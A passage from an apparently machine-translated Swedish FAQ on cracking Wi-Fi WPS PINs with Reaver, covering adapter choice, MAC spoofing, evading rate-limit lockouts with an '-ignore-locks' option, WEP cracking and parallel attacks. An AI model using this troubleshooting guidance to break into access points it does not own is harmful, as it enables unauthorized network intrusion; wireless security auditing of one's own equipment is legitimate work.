Svar: Innan du experimenterar måste du se till att den trådlösa adaptern kan fungera i övervakningsläge. Det bästa sättet är att kontrollera listan över hårdvara som stöds på Aircrack-ng-projektets webbplats. Om frågan uppstår om vilken trådlös modul du ska köpa, kan du börja med vilken adapter som helst baserad på RTL8187L-chipset. USB-donglar kan lätt hittas på Internet för $20.

Fråga: Varför får jag "timeout" och "out of order"-fel?

Svar: Detta händer vanligtvis på grund av låg signalstyrka och dålig kommunikation med åtkomstpunkten. Dessutom kan åtkomstpunkten tillfälligt blockera användningen av WPS.

Fråga: Varför fungerar inte MAC-adresspoofing för mig?

Svar: Det är möjligt att du förfalskar MAC:en för det virtuella gränssnittet mon0, och det kommer inte att fungera. Du måste ange namnet på det verkliga gränssnittet, till exempel wlan0.

Fråga: Varför fungerar Reaver dåligt när signalen är dålig, även om samma WEP-hackning fungerar bra?

Svar: WEP-krackning sker vanligtvis genom att återsända infångade paket för att erhålla fler initialiseringsvektorer (IV) som behövs för en framgångsrik crack. I det här fallet spelar det ingen roll om något paket har förlorats eller på något sätt skadats på vägen. Men för att attackera WPS måste du strikt följa paketöverföringsprotokollet mellan åtkomstpunkten och Reaver för att kontrollera varje PIN-kod. Och om samtidigt något paket försvinner eller anländer i en oanständig form, måste du återupprätta WPS-sessionen. Detta gör attacker mot WPS mycket mer beroende av signalstyrkan. Det är också viktigt att komma ihåg att bara för att din trådlösa adapter ser en åtkomstpunkt betyder det inte att åtkomstpunkten ser dig. Så om du är den lyckliga ägaren till en högeffektsadapter från ALFA Network och en antenn på ett par tiotals dBi, förvänta dig inte att kunna bryta alla fångade accesspunkter.

Fråga: Reaver skickar alltid samma PIN-kod till åtkomstpunkten, vad är det?

Svar: Kontrollera om WPS är aktiverat på routern. Detta kan göras med hjälp av tvättverktyget: kör det och kontrollera att ditt mål finns i listan.

Fråga: Varför kan jag inte associera med en åtkomstpunkt?

Svar: Detta kan bero på dålig signalstyrka eller på att din adapter är olämplig för sådan forskning.

Fråga: Varför får jag hela tiden "hastighetsbegränsning upptäckt"-fel? Svar: Detta beror på att åtkomstpunkten har blockerat WPS. Vanligtvis är detta en tillfällig blockering (cirka fem minuter), men i vissa fall kan de införa ett permanent förbud (avblockering endast via den administrativa panelen). Det finns en obehaglig bugg i Reaver version 1.3, på grund av vilken borttagning av sådana lås inte upptäcks. Som en lösning föreslår de att du använder alternativet "-ignore-locks" eller laddar ner den senaste versionen från SVN.

Fråga: Kan jag köra två eller flera instanser av Reaver samtidigt för att påskynda min attack?

Svar: Teoretiskt är det möjligt, men om de attackerar samma åtkomstpunkt är det osannolikt att sökhastigheten ökar, eftersom den i det här fallet begränsas av den svaga hårdvaran hos åtkomstpunkten, som redan är fulladdad även med en angripare .